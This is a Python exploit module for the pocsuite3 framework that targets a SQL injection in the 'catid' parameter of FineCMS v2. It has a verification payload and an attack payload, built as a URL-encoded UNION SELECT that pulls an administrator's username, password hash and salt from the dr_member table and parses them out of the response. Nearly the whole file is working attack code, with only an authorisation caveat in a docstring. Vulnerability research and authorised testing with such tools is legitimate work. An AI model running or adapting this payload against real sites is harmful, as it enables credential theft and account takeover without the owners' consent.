"""
If you have questions about PoC development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
For more information, please visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urljoin
import hashlib
import re
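class DemoPOC(POCBase):
    """pocsuite3 PoC for the FineCMS v2 ``catid`` SQL injection (ssvid 1270).

    ``models/Search_model.php`` passes the ``catid`` query parameter into a
    SQL statement without filtering.  ``_verify`` proves the injection with a
    harmless ``union all select md5(<random>)`` and looks for the digest in
    the page; ``_attack`` reuses the same single-column UNION to read one
    ``dr_member`` row (username, password hash, salt).

    ``_attack`` exfiltrates credential material from the target -- only run it
    where you are authorised to do so.
    """
    vulID = '1270'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2014-05-07'
    createDate = '2014-05-19'
    updateDate = '2014-05-19'
    references = ['http://wooyun.org/bugs/wooyun-2014-059753']
    name = 'Finecms 2 /models/search_model.php SQL注入漏洞 POC'
    appPowerLink = 'http://dayrui.com'
    appName = 'FineCMS'
    appVersion = 'v2#'
    vulType = 'SQL Injection'
    # (Chinese, kept verbatim: the ``catid`` parameter of
    # models/Search_model.php is used unfiltered in a SQL statement, giving a
    # SQL injection that can expose the administrator account and password.)
    desc = '''
models/Search_model.php 中 catid 参数未过滤带入 SQL
语句并执行,导致 SQL 注入漏洞,可以获取管理员的帐号
以及密码。
'''
    samples = []
    install_requires = ['']

    # Injection point.  ``catid=-3`` matches no real category, so the UNIONed
    # row is the only data the page has to render.
    _VUL_PATH = '/book/index.php?c=search&catid=-3'

    # Layout of the row produced by the ``_attack`` payload
    # ``concat(0x2d2d2d, username, 0x3a3a, password, 0x3a3a, salt, 0x2d2d2d)``:
    # ``---<username>::<32-char hash>::<salt>---``.  The first pattern picks it
    # out of a rendered page (HTTP 200), the second out of the SQL error page
    # (HTTP 500), where it appears quoted inside the failing statement.
    # Raw strings: ``\(``, ``\w`` and ``\d`` are invalid escapes in a plain
    # string literal and warn on recent Pythons.
    _ROW_IN_PAGE = re.compile(r'\(---(.*)::([\w\d]{32})::([\w\d]+)---\)')
    _ROW_IN_ERROR = re.compile(r", '---(.*)::([\w\d]{32})::([\w\d]+)---',")

    def _send_payload(self, payload):
        """GET the injection URL with the URL-encoded *payload* appended.

        No explicit timeout is passed: pocsuite3's patched ``requests`` is
        expected to apply the configured ``--timeout`` when none is given
        (NOTE(review): confirm; add ``timeout=`` here if a target can hang).
        """
        url = urljoin(self.url, self._VUL_PATH + payload)
        return requests.get(url)

    def _verify(self):
        """Confirm the injection without touching application data.

        The database is asked to compute ``md5(<random string>)``; if that
        digest appears in an HTTP 200 body the ``catid`` value reached SQL
        unfiltered.  Returns an :class:`Output` whose result carries
        ``VerifyInfo.URL`` on success and is marked failed otherwise.
        """
        result = {}
        try:
            flag = random_str()
            # The random flag makes a false positive from cached or static
            # content practically impossible.
            expected = hashlib.md5(flag.encode()).hexdigest()
            # NOTE(review): ``md5("...")`` relies on MySQL treating double
            # quotes as a string literal; a server running with ANSI_QUOTES
            # would read it as an identifier and the check would miss.
            payload = '%20union%20all%20select%20md5("{}")%23'.format(flag)
            resp = self._send_payload(payload)
            if resp.status_code == 200 and expected in resp.text:
                result['VerifyInfo'] = {'URL': self.url}
        except ReadTimeout:
            # A hung target is "not verified", not a crash; say why.
            logger.error('request to {} timed out'.format(self.url))
        except Exception as e:
            logger.error(str(e))
        return self.parse_output(result)

    def _attack(self):
        """Read one ``dr_member`` row (username, password hash, salt).

        The row is delimited with ``---``/``::`` so it can be extracted from
        either the rendered page or the SQL error page.  On success the
        result carries ``AdminInfo.Username`` and ``AdminInfo.Password`` in
        the form ``<hash>$<salt>``.

        NOTE(review): the payload hard-codes the table name ``dr_member``;
        an installation with a different table prefix will yield no match
        and be reported as not vulnerable even if ``_verify`` succeeded.
        """
        result = {}
        payload = ('%20union%20select%20concat(0x2d2d2d,username,0x3a3a,password,'
                   '0x3a3a,salt,0x2d2d2d)%20from%20dr_member%20limit%200,1%23')
        try:
            resp = self._send_payload(payload)
            if resp.status_code == 200:
                admin = self._extract_admin(self._ROW_IN_PAGE, resp.text)
            elif resp.status_code == 500:
                admin = self._extract_admin(self._ROW_IN_ERROR, resp.text)
            else:
                admin = None
            if admin:
                result['AdminInfo'] = admin
        except ReadTimeout:
            logger.error('request to {} timed out'.format(self.url))
        except Exception as e:
            logger.error(str(e))
        return self.parse_output(result)

    @staticmethod
    def _extract_admin(pattern, text):
        """Return ``{'Username': ..., 'Password': '<hash>$<salt>'}`` for the
        first match of *pattern* in *text*, or ``None`` if there is none."""
        match = pattern.search(text)
        if match is None:
            return None
        username, pw_hash, salt = match.groups()
        return {
            'Username': username,
            'Password': '{}${}'.format(pw_hash, salt),
        }

    def parse_output(self, result):
        """Wrap *result* in an :class:`Output`.

        A non-empty *result* is reported as success; an empty one as
        'target is not vulnerable'.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        # Not implemented: the injection reads data only, it does not give
        # code execution, so no reverse shell is attempted.
        pass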
# Register the PoC class with pocsuite3 so the framework can load and run it.
register_poc(DemoPOC)